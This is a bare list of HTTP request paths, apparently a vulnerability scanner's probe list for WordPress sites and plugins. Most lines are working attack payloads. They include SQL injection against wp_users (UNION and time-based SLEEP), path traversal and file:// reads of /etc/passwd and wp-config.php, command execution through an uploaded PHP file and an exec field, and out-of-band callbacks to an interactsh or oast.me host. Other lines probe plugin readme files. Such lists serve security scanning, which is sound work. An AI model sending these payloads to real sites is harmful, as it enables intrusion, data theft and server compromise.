/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-
/wp-json/visualizer/v1/upload-data
/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp1/home-18/?qtproxycall=https://oast.me
/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5(
/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)
/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g
/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}
/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo
/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0
/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1
/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL
/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ==
/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ
/xmlrpc.php
/wp-admin/admin-ajax.php?action=um_submit_form
/wp-admin/admin-ajax.php?action=register_user
/?p=19&bwg_search_0=*
/tour-list/?keywords=13%27%20AND%201%3D1--%20-
/wp1/home-18/?qtproxycall=https://{{interactsh-url}}
/?key=<a>
/wp-admin/edit.php?post_type=lp_course&lp-ajax=duplicator&id=149 and sleep(5)#
/wordpress/wp-admin/admin.php?page=vfb-export
/wp-admin/admin-ajax.php
/membership-join/membership-registration/
/path-to-easy-digital-downloads-export
/wp-login.php
/wp-admin/admin.php?page=c4p-main&order=%2C(SELECT(SLEEP(2)))&orderby=created
/fakepage
/wp-json/api/flutter_wholesale/register
/wp-content/plugins/mstore-api/readme.txt
/wp-content/plugins/ultimate-member/readme.txt
/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}
/wpb-show-core/download-file.php?path=/etc/resolv.conf
/wpb-show-core/download-file.php?path=/etc/hosts
/wpb-show-core/download-file.php?path=../../../wp-config.php
/wp-admin/admin.php?page=asgarosforum-options
/?filename=../../../../../../etc/passwd&mphb_action=download
/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={
/wp-content/plugins/essential-blocks/readme.txt
/?p=3232&wp_automatic=download&link=file:///etc/passwd
/wp-json/h5vp/v1/video/0?id=
/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/wordpress/installer.php
/
/wp-json/api/flutter_user/apple_login
/wp-content/plugins/dzs-zoomsounds/savepng.php?location=a.php
/?__proto__[poc]=polluted
/wp-admin/install.php
/wp-admin/admin.php?page=fluent_forms&form_id=1&route=entries
/wp-content/plugins/my-calendar/readme.txt
/?rest_route=/my-calendar/v1/events&from=1
/wp-includes/meta.php?meta_key=unprotected_meta_key&action=delete
/wpb-show-core/download-file.php?path=http://{{interactsh-url}}
/wp-content/themes/Newspaper/style.css
/wp-content/plugins/the-plus-addons-for-elementor-page-builder/readme.txt
/wp-content/plugins/form-maker/readme.txt
/wp-content/plugins/better-search-replace/README.txt
/wp-content/plugins/better-search-replace/readme.txt
